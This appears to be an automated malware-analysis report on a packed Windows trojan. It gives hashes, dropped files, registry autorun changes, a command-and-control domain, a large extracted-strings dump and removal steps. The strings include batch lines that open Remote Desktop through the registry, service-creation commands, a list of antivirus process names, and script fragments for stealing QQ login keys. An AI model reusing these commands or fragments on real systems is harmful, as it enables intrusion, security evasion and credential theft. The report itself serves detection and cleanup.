MD5: 3e183dae42ef88ab470e863410f35d27
SHA1: 2e5b21ecf9b72826e36f926fbc35eccad742e3a1
SHA256: 364d6d92678ea7a72160e432c823617330e75fa6f71522d156e8a8100d8aa812
SSDeep: 24576:osJghTxvY29EXS7d8u53B1UQLS2e37zp oD9q1/NqS6n46ecN5zTxu9CSezCrbS5:oKg9xg29ECx8u5LU8utFD9q1VqJ46dTz
Size: 1523732 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2016-04-28 08:20:32
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1780

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winder.lnk (738 bytes)
C:\System32\%original file name%.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\VBS1.vbs (653 bytes)

Registry activity

The process %original file name%.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"wshext.dll,-4511" = "Open &with Command Prompt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"%original file name%.exe" = "C:\System32\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ???
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Windows ????
Comments: ??????????(http://www.dywt.com.cn)
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
qq3256764477.b1.luyouxia.net	222.186.170.35

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.vmp0

.vmp1

.rsrc

t%SVh

t$(SSh

|$D.tm

FTPR

~%UVW

t.It It

u$SShe

shell32.dll

user32.dll

gdiplus.dll

ole32.dll

kernel32.dll

avicap32.dll

winmm.dll

ntdll.dll

advapi32.dll

ADVAPI32.DLL

Advapi32.dll

Winhttp.dll

rasapi32.dll

atl.dll

ShellExecuteA

keybd_event

GdiplusShutdown

GetKeyState

GetAsyncKeyState

CreatePipe

PeekNamedPipe

WinExec

RegOpenKeyExA

RegEnumKeyExA

RegCloseKey

RegCreateKeyA

RegDeleteKeyA

RegOpenKeyA

WinHttpCheckPlatform

WinHttpCrackUrl

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpSetCredentials

WinHttpCloseHandle

WinHttpSetOption

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpQueryHeaders

RegEnumKeyA

OpenWindowStationA

SetProcessWindowStation

Dwmapi.dll

@.reloc

1.2.3

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

<fd:%d>

%c%c%c%c%c%c%c%c%c%c

MSVCRT.dll

KERNEL32.dll

zlib1.dll

,@{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

command.com /c

cmd.exe /c

Windows 10

Windows Server Technical Preview

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

Windows 8

Windows Server 2012

Windows 8.1

Windows Server 2012 R2

Windows 2000

Windows XP

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Windows 98

Web Server Edition

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild

360tray.exe

360Tray.exe

QQPCTray.exe

360sd.exe

BaiduSdSvc.exe

kxetray.exe

KSafeTray.exe

RavMon.exe

KvMonXP.exe

mcupdui.exe

egui.exe

secenter.exe

avp.exe

ccSvrHst.exe

Navapsvc.exe

spiderui.exe

Dr.Web

avcenter.exe

avguard.exe

ashDisp.exe

FilMsg.exe

AVK.exe

PFW.exe

Iparmor.exe

2.txt

5B3838F5-0C81-46D9-A4C0-6EA28CA3E942

IEXPLORE.EXE

author:pengfei@VVV.cn-dos.netAAAAAAAAAA

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

$@\3389.bat

binPath= "cmd.exe /c start "

sc.exe Create "

sc.exe description "

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

HKEY_USERS

\Software\Microsoft\Windows\CurrentVersion\Run

Microsoft\VBS1.vbs

cmd.exe /c del

wscript.exe

hXXp://map.baidu.com/?qt=operateData&getOpModules=op1,op2,op3,op4,op5,op6,op7

http=

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Adodb.Stream

WinHttp

0@SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

\Microsoft\Network\Connections\pbk\rasphone.pbk

QQkey2

QQkey1

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0

javascript:for(var C=0;C<q_aUinList.length;C  ){var D=q_aUinList[C];document.write(D.uin "," D.key "[

C:\System32

qq3256764477.b1.luyouxia.net

C:\System32\

set wmi=getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")

set procs=wmi.execquery("select * from win32_process")

if strcomp(proc.name,proname)=0 then

Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run ("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") '60A

wscript.sleep 500

VBScript.RegExp

@{1d5be4b5-fa4a-452d-9cdd-5db35105e7eb}

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

<Msg%s>%ld</Msg%s>

0000%d

</Msg0000>

<Msg0000>

EMSG

Recv Sub Packet(%s)..

Recv Packet (%s)...

%s\%s.lnk

Software\Microsoft\Windows\CurrentVersion\Run

x86 Family %s Model %s Stepping %s

X-X-X-X

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

3%DM@X

.wT}R

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

activation.php?code=

deactivation.php?hash=

7:Œi

.?AVIUrlBuilderSource@@

E.HiyW5

U5%c_

%x14"

o%d\D

xcrT

eEbfZ7lÜ

.lTH\

J6R{[%X

-6}6 1O

%u;4J

y.Sp_6

Q.jcl

ht.uc

|$(hJ.VT

.:%.Km!2WB

h"%Cq

J9:;`-b}

aN.cJ

J%u;<z

Qð*

w%S`X

P.SAY

-x9b%DV

W.cH.

r.euQ

@.uen

!#p%s

~.gqJ}%

au.Mn5J

Ru.ha

e<%X#

lH.FZ4HT

GW?%du

z.fJv:

TCPse2

U.Ih!

.Wv=)YF

.foc*

b%.KV

',%.D;

AADVAPI32.dll

HdS}%F

.bK|{

iY%dT

&T'Y%x5

;Ñp5

Uo)!%'n%F

FI[ek%xh6e

g.iwab

Q|Í

gdLI,%U

p.MXF

5y.iQ*wl

.AU5]o

I!.eWJ

%U[e\HYK

t]UdPb

EsÞ

.Uo5eN}

þbk

 .gfuP_

qftp

.ghGBs

wEBCd

,%S%K*/

hL$s4.UIi

@_w%F

Q}sP%d

-%d[{

0%x#aP

H9=%s

fD.ED&

%dlP$

m%%uIl

V%UUL&QO

ea-u}_

*%DI9i

]N%st

C5eE%U

-%djx

)f0.eH

`%uBla

x.tc"B

QV%Uv

W%xilS

.ZO<&m

Ua-W}

.sh7j

WINMM.dll

X\.Be

.jy)>P

#%xkc

om.st

?R.Mw

c7U%s

.aYp(

=951-)%!

.SYiE

M%d"@%

.dkxA

;%d&K

_%7SX

^`.hm

s{.kN

u%Fg/

Cm-u}

7"lE%dxDTg

8mTKeygX

4f\.

%c-h(Z

iH%uZ%

|.Tgj

s%sUtwA

m.xPH

%Cy_X

.KV1e

"%Xl3

[c0%C

g`S.sM

"~L@%S

%dLope

r.isM

9R.ja

6%XSY

B|.pj(

.joMw

M<1%u

Ÿ?H

>.VAG

(m#L.OJ

z4Ot%X

.wbmD

ZRl".JX

.AP^3

.pvyI

E~E.ML

h$.XS

.KMwq

]g.ksO#

?>XK.Or

a{%4s

95'S%f

y2.nM

.gq'nb{

\u.uz

`.rG&KRY

L.Vb(*

.KwAi/

/']%s

}.ArRm

ð.{

~KJa%u_

(%9su

.Lcx@

Ouser32.dll

edH%Fu

L=Ñ

bA\x~8!%U

OLEAUT32.dll

Y(c.Yy

6}.sOr

4WININET.dll

USER32.dll

"Q.Ga

YpGDI32.dll

=comdlg32.dll

.Rac<

RASAPI32.dll

f2COMCTL32.dll

.Gd0N

^.ia5

WS2_32.dll

b%uHlh

.smzy

<G%d]g/

9,.Iv)

C%1U!

OmK.JGh

@J %Cn

oateakeYg

ak%X\

mCRt(E

e6.RIhW2me

.Il5f7x

SHELL32.dll

rM%du

2B.ec

.OY*m_

aKERNEL32.dll

WINSPOOL.DRV

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

!"#$%&'()* ,-./012

DLL support by Alessandro Iacopetti & Gilles Vollant

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

1.0.0.0

Windows

(hXXp://VVV.dywt.com.cn)

%original file name%.exe_1780_rwx_00531000_000EF000:

3%DM@X

.wT}R

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

activation.php?code=

deactivation.php?hash=

7:Œi

.?AVIUrlBuilderSource@@

c:\%original file name%.exe

E.HiyW5

U5%c_

%x14"

o%d\D

xcrT

eEbfZ7lÜ

.lTH\

J6R{[%X

-6}6 1O

%u;4J

y.Sp_6

Q.jcl

ht.uc

|$(hJ.VT

.:%.Km!2WB

h"%Cq

J9:;`-b}

aN.cJ

J%u;<z

Qð*

w%S`X

P.SAY

-x9b%DV

W.cH.

r.euQ

@.uen

!#p%s

~.gqJ}%

au.Mn5J

Ru.ha

e<%X#

lH.FZ4HT

GW?%du

z.fJv:

TCPse2

U.Ih!

.Wv=)YF

.foc*

b%.KV

',%.D;

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

%original file name%.exe_1780_rwx_00761000_00001000:

"Q.Ga

WScript.exe_948:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

msvcrt.dll

OLEAUT32.dll

ole32.dll

VERSION.dll

iu2.iu3;ku_

advapi32.dll

wscript.exe

kernel32.dll

%s%s.DLL

wintrust.dll

%d.%d

Invalid parameter passed to C runtime function.

SOFTWARE\Classes\%s\%s

0x%8X

CreateURLMonikerEx

urlmon.dll

@@8X%u

RegCreateKeyA

RegCloseKey

RegOpenKeyA

RegDeleteKeyA

RegCreateKeyExW

RegCreateKeyExA

RegOpenKeyExW

ReportEventW

RegEnumKeyExA

RegOpenKeyExA

GetProcessHeap

GetCPInfo

MsgWaitForMultipleObjects

EnumThreadWindows

wscript.pdb

stdole2.tlbWWW

.ObjectWW

KeyW

WindowsFolderWWW4

%CopyFolderWWL

Windows Script Host (Ver 5.6)W)

Windows Script Host Application InterfaceW%

Windows Script Host Object

ebstrCmdLineW

1.191>1[1

: :$:(:,:0:4:8:<:

Software\Microsoft\Windows Script Host\Settings

Windows Script Host

WScript.CreateObject

WSHRemote.Execute

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

Windows Based Script Host

5.8.7600.16385

Windows Script Host

(Windows Script Host (debugging disabled)

Windows Script Host Error

Windows Script Host Input Error

This Unicode version of Windows Script Host will only execute under Windows NT.

Please use the ANSI version of Windows Script Host."

WScript execution time was exceeded on script "%1!ls!".

Script execution was terminated.1Could not locate automation class named "%1!ls!".

Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).

Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.

Missing job name.*Unicode is not supported on this platform.

<The Windows Script Host settings have been reset to default.

Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.

Win32 Error 0x%X

Windows Script Host(Windows Script Host (debugging disabled)

Usage: WScript scriptname.extension [option...] [arguments...]

Use engine for executing script

Changes the default script host to CScript.exe

Changes the default script host to WScript.exe (default)

Prevent logo display: No banner will be shown at execution time

#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.

%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winder.lnk (738 bytes)
   C:\System32\%original file name%.exe (50 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\VBS1.vbs (653 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "%original file name%.exe" = "C:\System32\%original file name%.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.